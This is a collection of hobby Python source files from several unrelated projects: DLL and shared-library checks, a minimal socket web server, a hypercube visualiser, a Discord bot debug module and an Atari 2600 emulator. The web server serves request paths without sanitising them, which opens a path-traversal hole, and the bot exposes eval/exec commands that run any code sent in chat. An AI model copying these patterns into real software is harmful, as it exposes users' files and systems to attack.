if __name__ == '__main__':
main()
```
#### File: Pythia/tools/primitive_git.py
```python
import os
def get_sha1_from_file(base_dir, relative_path):
"""
Try to read base_dir/relative_path. For git head, relative_path should be 'HEAD'.
If it contains a sha1, return it.
If it contains a ref, open base_dir/<ref> and return its contents.
On error, return None
"""
try:
head_file_path = os.path.join(base_dir, relative_path)
head_file = open(head_file_path, "r")
head_contents = head_file.readlines()
line = head_contents[0].rstrip('\n')
if line.startswith('ref: '):
ref = line[5:] # Skip the 'ref: '
ref_file_path = os.path.join(base_dir, ref)
ref_file = open(ref_file_path, "r")
ref_file_contents = ref_file.readlines()
sha1 = ref_file_contents[0].rstrip('\n')
else:
sha1 = line
except (IOError, IndexError) as e:
sha1 = None
return sha1
def get_sha1_from_git_directory(base_repo_dir):
"""Get the sha1 of the last commit of a repository.
The base_repo_dir should contain a direct '.git' subdirectory"""
return get_sha1_from_file(os.path.join(base_repo_dir, '.git'), 'HEAD')
```
#### File: Pythia/tools/safety_checks.py
```python
import argparse
import os
import sys
from typing import List
from pkg_resources import parse_version
def check_dll_architecture(path: str, x86=False):
arch = '32bit' if x86 else '64bit'
print(f'Checking if file {path} is {arch}...')
try:
import pefile
except ImportError:
print('Install pefile: pip install pefile')
sys.exit(1)
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
pe = pefile.PE(path)
arch32 = bool(pe.NT_HEADERS.FILE_HEADER.Characteristics & pefile.IMAGE_CHARACTERISTICS['IMAGE_FILE_32BIT_MACHINE'])
if (x86 and not arch32) or (not x86 and arch32):
print(f'File {path} is not {arch}!')
sys.exit(1)
def check_dll_is_static(path: str, allowed_imports: List = None):
"""
Ensure a given DLL doesn't try importing some funny dependencies
because we messed up something in the compiler options or something.
"""
print(f'Checking if file {path} is static...')
try:
import pefile
except ImportError:
print('Install pefile: pip install pefile')
sys.exit(1)
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
if allowed_imports is None:
allowed_imports = []
allowed_imports_lower = {b'kernel32.dll'}
for allowed_import in allowed_imports:
allowed_imports_lower.add(allowed_import.lower())
pe = pefile.PE(path)
file_imports = [entry.dll.lower() for entry in pe.DIRECTORY_ENTRY_IMPORT]
for file_import in file_imports:
if file_import not in allowed_imports_lower:
print(f'File {path} is not static! It imports {file_import}!')
sys.exit(1)
def check_so_architecture(path: str, x86=False):
arch = '32bit' if x86 else '64bit'
print(f'Checking if file {path} is {arch}...')
try:
import elftools
except ImportError:
print('Install elftools: pip install pyelftools')
sys.exit(1)
from elftools.elf.elffile import ELFFile
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
with open(path, 'rb') as file:
elffile = ELFFile(file)
arch32 = elffile.elfclass == 32
if (x86 and not arch32) or (not x86 and arch32):
print(f'File {path} is not {arch}!')
sys.exit(1)
def check_so_is_manylinux2014(path: str, allowed_imports: List = None):
# PEP 599
allowed_shared_objects = {
'libgcc_s.so.1',
'libstdc++.so.6',
'libm.so.6',
'libdl.so.2',
'librt.so.1',
'libc.so.6',
'libnsl.so.1',
'libutil.so.1',
'libpthread.so.0',
'libresolv.so.2',
'libX11.so.6',
'libXext.so.6',
'libXrender.so.1',
'libICE.so.6',
'libSM.so.6',
'libGL.so.1',
'libgobject-2.0.so.0',
'libgthread-2.0.so.0',
'libglib-2.0.so.0',
}
allowed_symbol_versions = {
'GLIBC': parse_version('2.17'),
'CXXABI': parse_version('1.3.7'),
'GLIBCXX': parse_version('3.4.19'),
'GCC': parse_version('4.8.0'),
}
allowed_imports_lower = {'ld-linux.so.2', 'ld-linux-x86-64.so.2'}
if allowed_imports:
for allowed_import in allowed_imports:
allowed_imports_lower.add(allowed_import)
print(f'Checking if file {path} is manylinux2014...')
try:
import auditwheel
except ImportError:
print('Install auditwheel: pip install auditwheel')
sys.exit(1)
from auditwheel.lddtree import lddtree
from auditwheel.elfutils import elf_find_versioned_symbols
from elftools.elf.elffile import ELFFile
if not os.path.exists(path):
print(f'File {path} is missing!')
sys.exit(1)
# Check if all libs are in the allowed_shared_objects or whitelisted
elftree = lddtree(path)
libs = elftree['libs'].keys()
for lib in libs:
if lib not in allowed_shared_objects and lib not in allowed_imports_lower:
print(f'File {path} depends on {lib} which doesn\'t match the manylinux2014 requirements. '
'This file will need to be vendored in!')
sys.exit(1)
# Check if all versioned symbols are at the values in allowed_symbol_versions or lower
with open(path, 'rb') as file:
elffile = ELFFile(file)
for filename, symbol in elf_find_versioned_symbols(elffile):
symbol_name, _, version = symbol.partition('_')
if parse_version(version) > allowed_symbol_versions[symbol_name]:
print(f'There is a call to {symbol_name} at version {version} which is not allowed for manylinux2014. '
'Rebuild the code using the manylinux2014 docker image!')
sys.exit(1)
def safety_checks(python_version):
major, minor, patch = python_version.split('.')
dll_import = f'python3{minor}.dll'.encode('ascii')
so_import = f'libpython3.{minor}{"m" if minor == "7" else ""}.so.1.0'
check_dll_is_static(os.path.join('@Pythia', 'Pythia.dll'), allowed_imports=[dll_import])
check_dll_is_static(os.path.join('@Pythia', 'Pythia_x64.dll'), allowed_imports=[dll_import])
check_dll_is_static(os.path.join('@Pythia', 'PythiaSetPythonPath.dll'))
check_dll_is_static(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.dll'))
print()
check_dll_architecture(os.path.join('@Pythia', 'Pythia.dll'), x86=True)
check_dll_architecture(os.path.join('@Pythia', 'Pythia_x64.dll'), x86=False)
check_dll_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath.dll'), x86=True)
check_dll_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.dll'), x86=False)
print()
check_so_architecture(os.path.join('@Pythia', 'Pythia.so'), x86=True)
check_so_architecture(os.path.join('@Pythia', 'Pythia_x64.so'), x86=False)
check_so_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath.so'), x86=True)
check_so_architecture(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.so'), x86=False)
print()
linux_imports = [so_import, 'libcrypt.so.1']
check_so_is_manylinux2014(os.path.join('@Pythia', 'Pythia.so'), allowed_imports=linux_imports)
check_so_is_manylinux2014(os.path.join('@Pythia', 'Pythia_x64.so'), allowed_imports=linux_imports)
check_so_is_manylinux2014(os.path.join('@Pythia', 'PythiaSetPythonPath.so'))
check_so_is_manylinux2014(os.path.join('@Pythia', 'PythiaSetPythonPath_x64.so'))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Perform basic safety checks over the DLLs/SOs')
parser.add_argument('version', help='Python version against which to check')
args = parser.parse_args()
safety_checks(args.version)
``` |
{
"source": "5skr0ll3r/WebCthulhu",
"score": 3
} |
#### File: 5skr0ll3r/WebCthulhu/cthulhu.py
```python
import socket,threading,re,sys,os
import reqspliter as rs
hel = ("h", "help", "H", "HELP")
#Accepted methods by server
methods = ("GET","POST","HEAD","DELETE","CONNECT","PUT","OPTIONS","TRACE","PATCH")
#Accepted file extensions
file_ext = (".html",".css",".js")
imag_ext = (".jpeg",".png","jpg")
def requirements_check():
if len(sys.argv) < 3:
if len(sys.argv) == 1:
sys.exit(f"Usage: {sys.argv[0]} <Port> <Project_Path>")
if sys.argv[1] in hel:
sys.exit(f"Usage: {sys.argv[0]} <Port> <Project_Path>\n\n<Port>: The port you want the server to communicate through\n<Project_Path>: The path to the directory index file is in\nExample: python3 {sys.argv[0]} 5444 www")
else:
sys.exit("Uknown Error Occured")
else:
pass
def read_file(Project_Path,req_file_path,file_extension,imag_ext):
if file_extension in imag_ext:
print("\n\nIs image so read in bytes\n\n")
file_path = Project_Path + req_file_path
strip_path = file_path.strip()
print(os.path.exists(strip_path))
if os.path.exists(strip_path):
print(f"File {strip_path} found")
with open(strip_path,'rb') as op_file:
image = op_file.read()
return image, 'True'
else:
print(f"File {strip_path} not found")
return 'False'
else:
print("Not image read as string")
file_path = Project_Path + req_file_path
strip_path = file_path.strip()
print(os.path.exists(strip_path))
if os.path.exists(strip_path):
print(f"File {strip_path} found")
with open(strip_path) as op_file:
code = op_file.read()
return code
else:
print(f"File {strip_path} not found")
return 'False'
def connections_handler(connection,addr,Project_Path,imag_ext,file_ext):
print(f"=> {addr} Connected")
active_connection = True
while active_connection:
if active_connection == False:
break
packet = connection.recv(3000)
data = packet.decode('utf-8')
print(f"Data received: \n\n{data}\n\n")
req_type = rs.check_req_type(data,methods)
if req_type != "False":
req_file_path = rs.check_req_file_path(data,req_type)
if req_file_path != "False":
file_extension = rs.determine_file_ext_from_req(req_file_path,file_ext, imag_ext)
if file_extension != "False":
head_cont_type = rs.header_content_type(file_extension,imag_ext)
print("Request Accepted")
code = read_file(Project_Path,req_file_path,file_extension,imag_ext)
print(f"code\n\n{code}\n\n")
if code[1] == 'True':
msg = connection.send(
f"HTTP/1.1 200 OK\nConnection: Keep-Alive\r\nServer: Cthulhu/0.1\r\nContent-Type: {head_cont_type};\r\nKeep-Alive: timeout=5, max=1000\r\n\r\n {code[0].strip()}".encode())
connection.close()
elif code == 'False':
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
else:
msg = connection.send(
f"HTTP/1.1 200 OK\nConnection: Keep-Alive\r\nServer: Cthulhu/0.1\r\nContent-Type: {head_cont_type};\r\nKeep-Alive: timeout=5, max=1000\r\n\r\n{code}".encode())
connection.close()
else:
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
else:
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
else:
connection.send("HTTP/1.1 404 NOT FOUND\r\nServer: Cthulhu/0.1".encode())
connection.close()
#Main function
def start():
requirements_check()
HOST = socket.gethostbyname(socket.gethostname())
PORT = int(sys.argv[1])
Project_Path = sys.argv[2]
#Create socket object bind with given vars and start listening
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,PORT))
s.listen()
print(f"{HOST} Started listening on port: {PORT}")
#Will create a thread for every accepted connection so the server can be non-block
while True:
connection, addr = s.accept()
thread = threading.Thread(target=connections_handler, args=(connection,addr, Project_Path,imag_ext,file_ext))
thread.start()
print(f"=> Active connections {threading.activeCount() - 1}")
start()
``` |
{
"source": "5space/hypercube-visualizer",
"score": 3
} |
#### File: 5space/hypercube-visualizer/projector.py
```python
import pygame
from math import *
import numpy as np
import itertools
from shapes import *
WIDTH = 500
HEIGHT = 500
screen = pygame.display.set_mode((WIDTH, HEIGHT))
FOV = 60
clock = pygame.time.Clock()
class Camera4D:
def __init__(self, *pos):
self.pos = np.array(pos)
def get_3d_projection(self, point):
offset = point - self.pos
if offset[0] <= 0:
x, y, z = offset[1:]
r = sqrt(x**2 + y**2 + z**2)
return 1000000*x/r, 1000000*y/r, 1000000*z/r
_, x, y, z = offset/offset[0]
return x, y, z
class Camera:
def __init__(self, *pos):
self.pos = np.array(pos)
def get_2d_projection(self, point):
offset = point - self.pos
if offset[0] <= 0:
a = atan2(offset[2], offset[1])
return (WIDTH/2 + 1000000*cos(a), HEIGHT/2 + 1000000*sin(a))
_, x, y = offset/offset[0]
mult = WIDTH/2/tan(FOV*pi/360)
return (WIDTH/2 + mult*x, HEIGHT/2 + mult*y)
GLOBAL_CAMERA = Camera4D()
p = (sqrt(5) + 1)/2
# edge_colors = {1:np.array([255, 0, 0]), 2:np.array([0, 255, 0]), 4:np.array([0, 0, 255]), 8:np.array([255, 255, 0])}
camera = Camera(-2., 0., 0.)
camera4d = Camera4D(-3., 0., 0., 0.)
points0, edges = hypercube()
angles = [0., 0., 0., 0., 0., 0.] # WX, WY, WZ, XY, XZ, YZ in that order
def get_rotated_position(p):
p = list(p)
key = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)]
for i in range(6):
a1, a2 = key[i]
angle = angles[i]
sign_flipper = -1 if ((a2 - a1) % 2 == 0) else 1
p[a1], p[a2] = p[a1]*cos(angle) - sign_flipper*p[a2]*sin(angle), sign_flipper*p[a1]*sin(angle) + p[a2]*cos(angle)
return tuple(p)
mouse_down = False
drag_start_pos = (0, 0)
drag_offset = (0, 0)
scroll_velocity = 1
while True:
screen.fill((0, 0, 0))
points_rotated = map(get_rotated_position, points0)
points_3d = list(map(camera4d.get_3d_projection, points_rotated))
screen_space = list(map(camera.get_2d_projection, points_3d))
def distance_from_camera(x):
return np.linalg.norm((np.array(points_3d[x[0]])+points_3d[x[1]])/2 - camera.pos)
def color_of_edge(edge):
color = np.array([255, 255, 255.]) # edge_colors[abs(b-a)]
distance_mult = max(0.1, min(1, 10/(e**(-3*distance_from_camera(edge)/camera.pos[0]))))
color *= distance_mult
return tuple(np.around(color))
edges_sorted = sorted(edges, key=distance_from_camera)[::-1]
for a, b in edges_sorted:
pygame.draw.line(screen, color_of_edge((a, b)), screen_space[a], screen_space[b], 5)
# for ptx, pty in screen_space:
# pygame.draw.circle(screen, (255, 0, 0), (int(ptx), int(pty)), 3)
keys = pygame.key.get_pressed()
if keys[pygame.K_UP]:
FOV += 0.5
elif keys[pygame.K_DOWN]:
FOV -= 0.5
if keys[pygame.K_RIGHT]:
camera4d.pos[0] -= 0.01
elif keys[pygame.K_LEFT]:
camera4d.pos[0] += 0.01
if keys[pygame.K_w]:
angles[0] += pi/180
elif keys[pygame.K_s]:
angles[0] -= pi/180
if keys[pygame.K_d]:
angles[1] += pi/180
elif keys[pygame.K_a]:
angles[1] -= pi/180
if keys[pygame.K_e]:
angles[2] += pi/180
elif keys[pygame.K_q]:
angles[2] -= pi/180
for event in pygame.event.get():
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
mouse_down = True
drag_start_pos = event.pos
drag_start_angles = np.array(angles)
elif event.button == 4:
scroll_velocity = 1/3
elif event.button == 5:
scroll_velocity = 3
elif event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
mouse_down = False
if mouse_down:
x, y = pygame.mouse.get_pos()
drag_offset = (x - drag_start_pos[0], y - drag_start_pos[1])
angles = angles[:3] + list(drag_start_angles[3:] + [-pi*drag_offset[0]/WIDTH, pi*drag_offset[1]/HEIGHT, 0])
angles = [((a+pi) % (2*pi)) - pi for a in angles]
angles[4] = min(pi/2, max(-pi/2, angles[4]))
camera.pos[0] *= scroll_velocity**0.02
scroll_velocity **= 0.95
# print(angles[0]-pi/4, angles[1]-pi/4, angles[2]-pi/4)
pygame.display.flip()
clock.tick(60)
``` |
{
"source": "5space/nesbot",
"score": 2
} |
#### File: modules/debug/cog.py
```python
from discord.ext import commands
import discord
class Debug(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.group(name="module",
aliases=["m"])
@commands.is_owner()
async def module(self, ctx):
if ctx.invoked_subcommand is None:
await ctx.send("Invalid command passed.")
@module.command(name="unload",
aliases=["u", "ul"])
async def module_unload(self, ctx, *, name):
self.bot.unload_extension("modules." + name + ".cog")
self.bot.log(f"Unloaded module {name}.")
await ctx.send(f"Unloaded module {name}.")
@module.command(name="load",
aliases=["l"])
async def module_load(self, ctx, *, name):
self.bot.load_extension("modules." + name + ".cog")
self.bot.log(f"Loaded module {name}.")
await ctx.send(f"Loaded module {name}.")
@module.command(name="reload",
aliases=["r", "rl"])
async def module_reload(self, ctx, *, name):
self.bot.reload_extension("modules." + name + ".cog")
self.bot.log(f"Reloaded module {name}.")
await ctx.send(f"Reloaded module {name}.")
@module.command(name="list",
aliases=["li"])
async def module_list(self, ctx):
await ctx.send("```" + "".join(f"{module}: {len(self.bot.get_module(module).get_commands())} command(s)\n" for module in self.bot.modules) + "```")
@commands.command(name="eval")
@commands.is_owner()
async def owner_eval(self, ctx, *, query):
try:
if query[:6] == "await ":
k = await eval(query[6:], locals())
if k is not None:
await ctx.send(k)
else:
k = eval(query, locals())
if k is not None:
await ctx.send(k)
except Exception as ex:
await ctx.send(f"```{ex}```")
@commands.command(name="exec")
@commands.is_owner()
async def owner_exec(self, ctx, *, query):
try:
exec(query, locals())
except Exception as ex:
await ctx.send(f"```{ex}```")
def setup(bot):
bot.add_cog(Debug(bot))
```
#### File: pytari2600/cpu_gen/pc_state.py
```python
class PC_Register(object):
def __init__(self):
self.value = 0
def get_save_state(self):
return self.value
def set_save_state(self, state):
self.value = state
def __add__(self, x):
self.value = (self.value + x) & 0xFF
return self
def __sub__(self, x):
self.value = (self.value - x) & 0xFF
return self
def __int__(self):
return self.value
def set_value(self, value):
if isinstance(value, PC_Register):
self.value = value.get_value()
else:
self.value = value & 0xFF
def get_value(self):
return self.value
def __str__(self):
return "%X"%(self.value)
class PC_StatusFlags(object):
def __init__(self):
self._value = 0
def get_save_state(self):
return self._value
def set_save_state(self, state):
self._value = state
def get_value(self):
return self._value
def set_value(self, value):
self._value = value
def set_N(self, value):
self._value = (self._value & 0x7F) | ((value & 1) << 7)
def set_V(self, value):
self._value = (self._value & 0xBF) | ((value & 1) << 6)
def set_X1(self, value):
self._value = (self._value & 0xDF) | ((value & 1) << 5)
def set_B(self, value):
self._value = (self._value & 0xEF) | ((value & 1) << 4)
def set_D(self, value):
self._value = (self._value & 0xF7) | ((value & 1) << 3)
def set_I(self, value):
self._value = (self._value & 0xFB) | ((value & 1) << 2)
def set_Z(self, value):
self._value = (self._value & 0xFD) | ((value & 1) << 1)
def set_C(self, value):
self._value = (self._value & 0xFE) | (value & 1)
def get_N(self):
return (self._value >> 7) & 1
def get_V(self):
return (self._value >> 6) & 1
def get_X1(self):
return (self._value >> 5) & 1
def get_B(self):
return (self._value >> 4) & 1
def get_D(self):
return (self._value >> 3) & 1
def get_I(self):
return (self._value >> 2) & 1
def get_Z(self):
return (self._value >> 1) & 1
def get_C(self):
return (self._value) & 1
def __str__(self):
return "(C:%s Z:%s I:%s D:%s B:%s X1:%s V:%s N:%s)"%(
self.get_C(), self.get_Z(), self.get_I(), self.get_D(),
self.get_B(), self.get_X1(), self.get_V(), self.get_N())
class PC_State(object):
def __init__(self):
self.A = PC_Register()
self.X = PC_Register()
self.Y = PC_Register()
self.PC = 0
self.S = PC_Register()
self.CYCLES_TO_CLOCK = 3
self.P = PC_StatusFlags()
def get_save_state(self):
state = {}
state['A'] = self.A.get_save_state()
state['X'] = self.X.get_save_state()
state['Y'] = self.Y.get_save_state()
state['PC'] = self.PC
state['S'] = self.S.get_save_state()
state['P'] = self.P.get_save_state()
return state
def set_save_state(self, state):
self.A.set_save_state(state['A'])
self.X.set_save_state(state['X'])
self.Y.set_save_state(state['Y'])
self.PC = state['PC']
self.S.set_save_state(state['S'])
self.P.set_save_state(state['P'])
def __str__(self):
return "PC:%X X:%X Y:%X A:%X %s"%(
self.PC,
self.X, self.Y, self.A,
self.P)
def get_PCL(self):
return self.PC & 0xFF
def get_PCH(self):
return (self.PC >> 8) & 0xFF
def set_PCL(self, value):
self.PC = self.PC & 0xFF00 | (value & 0xFF)
def set_PCH(self, value):
self.PC = self.PC & 0xFF | ((value & 0xFF) << 8)
```
#### File: pytari2600/memory/cartridge.py
```python
class PBCartridge(object):
MAXBANKS = 8
BANKSIZE = 0x0400
def __init__(self, file_name):
self.max_banks = PBCartridge.MAXBANKS
self.bank_size = PBCartridge.BANKSIZE
self._slice = [0]*4
self._slice[0] = 4
self._slice[1] = 5
self._slice[2] = 6
self._slice[3] = 7
self.num_banks = 0
self.current_bank = 0
self._file_name = file_name
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['current_bank'] = self.current_bank
state['file_name'] = self._file_name
state['slices'] = list(self._slice)
return state
def set_save_state(self, state):
self.current_bank = state['current_bank']
self._file_name = state['file_name']
self._slice = list(state['slices'])
def get_absolute_address(self, address):
absolute = self.bank_size * self._slice[(address & 0xC00) >> 10] + (address & 0x3FF)
return absolute
def write(self, address, data):
address = address & 0xFFF
if 0xFE0 == (address & 0xFF8):
self._slice[0] = address & 0x7
elif 0xFE8 == (address & 0xFF8):
self._slice[1] = address & 0x7
elif 0xFF0 == (address & 0xFF8):
self._slice[2] = address & 0x7
def read(self, address):
"""
0xFF6 == address: Last bank - 3
0xFF7 == address: Last bank - 2
0xFF8 == address: Last bank - 1
0xFF9 == address: Last bank
"""
address = address & 0xFFF
if 0xFE0 == (address & 0xFF8):
self._slice[0] = address & 0x7
elif 0xFE8 == (address & 0xFF8):
self._slice[1] = address & 0x7
elif 0xFF0 == (address & 0xFF8):
self._slice[2] = address & 0x7
return self.cartridge_banks[self._slice[(address & 0xC00) >> 10]][address & 0x3FF]
def _load_cartridge(self, filename):
bytes_read = 0
total_bytes_read = 0
self.max_cartridge = [[]] * self.max_banks
print("Opening: ", filename)
with open(filename, 'rb') as rom_file:
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if (bytes_read != 0):
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
if (bytes_read > 0) and (bytes_read < self.bank_size):
print("Warning: Short Cartridge")
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("PBCartridge read:")
print(" banks =", self.num_banks)
print(" bytes =", total_bytes_read)
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class MNetworkCartridge(object):
MAXBANKS = 8
BANKSIZE = 0x0800
RAMSIZE = 0x0800
def __init__(self, file_name):
self.max_banks = MNetworkCartridge.MAXBANKS
self.bank_size = MNetworkCartridge.BANKSIZE
self.ram_size = MNetworkCartridge.RAMSIZE
self.num_banks = 0
self.bank_select = 0
self.ram_select = 0
self.ram = []
self._file_name = file_name
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['ram'] = list(self.ram)
state['current_bank'] = self.current_bank
state['ram_select'] = self.ram_select
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self.ram = list(state['ram'])
self.current_bank = state['current_bank']
self.ram_select = state['ram_select']
self._file_name = state['file_name']
def get_absolute_address(self, address):
bank = self.bank_select
if ((address & 0xF00) >= 0xA00):
bank = 7
return bank * self.bank_size + (address & 0x7FF)
def write(self, address, data):
address = address & 0xFFF
if 0xFE0 == (address & 0xFF8):
# Bank select 0 to 7
self.bank_select = address & 0x7
elif 0xFE8 == (address & 0xFF8):
# 256k Ram select.
self.ram_select = address & 0x3
if (self.bank_select == 7 and 0x000 == (address & 0x800)):
self.ram[address & 0x3FF] = data
elif 0x800 == (address & 0xF00):
# Selectable 256Kb RAM. write on 1800-18FF
self.ram[(address & 0x7FF) | 0x400 | (self.ram_select << 8)] = data
else:
print("Invalid write address %x"%(address))
def read(self, address):
address = address & 0xFFF
if (0xFE0 == (address & 0xFF8)):
self.bank_select = address & 0x7
elif (0xFE8 == (address & 0xFF8)):
self.ram_select = address & 0x3
if ((self.bank_select == 7) and (0x400 == (address & 0xC00))):
# Return reads from ram.
byte = self.ram[address & 0x3FF]
elif (0x000 == (address & 0x800)):
# Return cartridge select.
byte = self.cartridge_banks[self.bank_select][address & 0x7FF]
elif (0x900 == (address & 0xF00)):
# Selectable 256Kb RAM. write on 1800-18FF
byte = self.ram[(address & 0x7FF) | 0x400 | (self.ram_select << 8)]
elif ((address & 0xF00) >= 0xA00):
# Return fixed cartridge location.
byte = self.cartridge_banks[7][address & 0x7FF]
else:
print("Invalid address %x"%(address))
byte = 0
return byte
def _load_cartridge(self, filename):
bytes_read = 0
total_bytes_read = 0
self.max_cartridge = [[]] * self.max_banks
print("Opening: ", filename)
self.ram = [] * self.RAMSIZE
with open(filename, 'rb') as rom_file:
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if bytes_read != 0:
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("MNetworkCartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_banks[0]))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class FECartridge(object):
def __init__(self, file_name, max_banks, bank_size):
self.max_banks = max_banks
self.bank_size = bank_size
self.cartridge_banks = [[]] * self.max_banks
self.num_banks = 0
self.current_bank = 0
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['current_bank'] = self.current_bank
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self.current_bank = state['current_bank']
self._file_name = state['file_name']
def get_absolute_address(self, address):
if 0x0000 == (address & 0x2000):
current_bank = 1
elif 0x2000 == (address & 0x2000):
current_bank = 0
return current_bank * self.bank_size + (address & 0xFFF)
def read(self, address):
if 0x0000 == (address & 0x2000):
self.current_bank = 1
elif 0x2000 == (address & 0x2000):
self.current_bank = 0
address = address & 0xFFF
return self.cartridge_banks[self.current_bank][address]
def write(self, address, data):
if 0x0000 == (address & 0x2000):
self.current_bank = 1
elif 0x2000 == (address & 0x2000):
self.current_bank = 0
def _load_cartridge(self, filename):
total_bytes_read = 0
print("Opening:", filename)
with open(filename, 'rb') as rom_file:
self.max_cartridge = [[]] * self.max_banks
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
print("nb:%d,%x"%(self.num_banks, self.bank_size))
if bytes_read != 0:
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("Cartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_banks[0]))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class SingleBankCartridge(object):
""" Simple, single bank cartridge, no bank switching. """
def __init__(self, file_name, bank_size):
self.bank_size = bank_size
self.cartridge_bank = []
self.num_banks = 0
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self._file_name = state['file_name']
def get_absolute_address(self, address):
return (address & 0xFFF)
def read(self, address):
return self.cartridge_bank[address & 0xFFF]
def write(self, address, data):
pass
def _load_cartridge(self, filename):
total_bytes_read = 0
print("Opening:", filename)
with open(filename, 'rb') as rom_file:
self.max_cartridge = []
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if (bytes_read > 0) and (bytes_read < self.bank_size):
# If the bank is short, pad it with zeros.
bank += '\000' * (self.bank_size-bytes_read)
# If the read size was less than a half bank, copy the
# shortfall.
if bytes_read <= self.bank_size/2:
bank = bank[0:self.bank_size/2] + bank[0:self.bank_size/2]
self.max_cartridge = bank[0:self.bank_size/2] + bank[0:self.bank_size/2]
self.max_cartridge = bytearray(bank)
total_bytes_read += bytes_read
self.cartridge_bank = []
self.cartridge_bank = self.max_cartridge
print("Cartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_bank))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
class GenericCartridge(object):
def __init__(self, file_name, max_banks, bank_size, hot_swap, ram_size):
self.max_banks = max_banks
self.bank_size = bank_size
self.hot_swap = hot_swap
self.ram_size = ram_size
self.ram_addr_mask = 0xFFFF & (self.ram_size - 1)
self.cartridge_banks = [[]] * self.max_banks
self.ram = []
self.num_banks = 0
self.current_bank = 0
self.bank_select = 0
self._file_name = file_name
self._load_cartridge(file_name)
def get_save_state(self):
state = {}
state['ram'] = list(self.ram)
state['current_bank'] = self.current_bank
state['file_name'] = self._file_name
return state
def set_save_state(self, state):
self.ram = list(state['ram'])
self.current_bank = state['current_bank']
self._file_name = state['file_name']
def get_absolute_address(self, address):
return self.bank_size * self.current_bank + (address & 0xFFF)
def read(self, address):
address = address & 0xFFF
if (self.ram_size > 0) and (address < 2*self.ram_size) and (address >= self.ram_size):
data = self.ram[address & self.ram_addr_mask]
else:
# 0xFF8 == address: Last bank - 2
# 0xFF9 == address: Last bank - 1
# 0xFFA == address: Last bank
if (((self.hot_swap +1) - self.num_banks) <= address) and ((self.hot_swap+1) > address):
self.current_bank = self.num_banks - ((self.hot_swap+1) - address)
data = self.cartridge_banks[self.current_bank][address]
return data
def write(self, address, data):
address = address & 0xFFF
if (self.ram_size > 0) and (address < self.ram_size):
self.ram[address & self.ram_addr_mask] = data
if (((self.hot_swap+1) - self.num_banks) <= address) and ((self.hot_swap+1) > address):
self.current_bank = self.num_banks - ((self.hot_swap+1) - address)
def _load_cartridge(self, filename):
total_bytes_read = 0
print("Opening:", filename)
with open(filename, 'rb') as rom_file:
if (self.ram_size > 0):
self.ram = [0] * self.ram_size
self.max_cartridge = [[]] * self.max_banks
full = rom_file.read()
for bank in self._chunks(full, self.bank_size):
bytes_read = len(bank)
if (bytes_read > 0) and (bytes_read < self.bank_size):
# If the bank is short, pad it with zeros.
bank += bytearray('\000'.encode() * (self.bank_size-bytes_read))
# If the read size was less than a half bank, copy the
# shortfall.
if bytes_read <= int(self.bank_size/2):
bank = bank[0:int(self.bank_size/2)] + bank[0:int(self.bank_size/2)]
self.max_cartridge[self.num_banks] = bank[0:int(self.bank_size/2)] + bank[0:int(self.bank_size/2)]
self.max_cartridge[self.num_banks] = bytearray(bank)
self.num_banks += 1
total_bytes_read += bytes_read
self.cartridge_banks = [[]] * self.num_banks
for i in range(self.num_banks):
self.cartridge_banks[i] = self.max_cartridge[i]
# Set default bank to the last bank.
self.current_bank = 0
print("Cartridge read:")
print(" banks = ", self.num_banks)
print(" bytes = ", total_bytes_read)
print(" first bank size = ", len(self.cartridge_banks[0]))
def _chunks(self, l, n):
for i in range(0, len(l), n):
yield l[i:i+n]
if __name__ == '__main__':
import sys
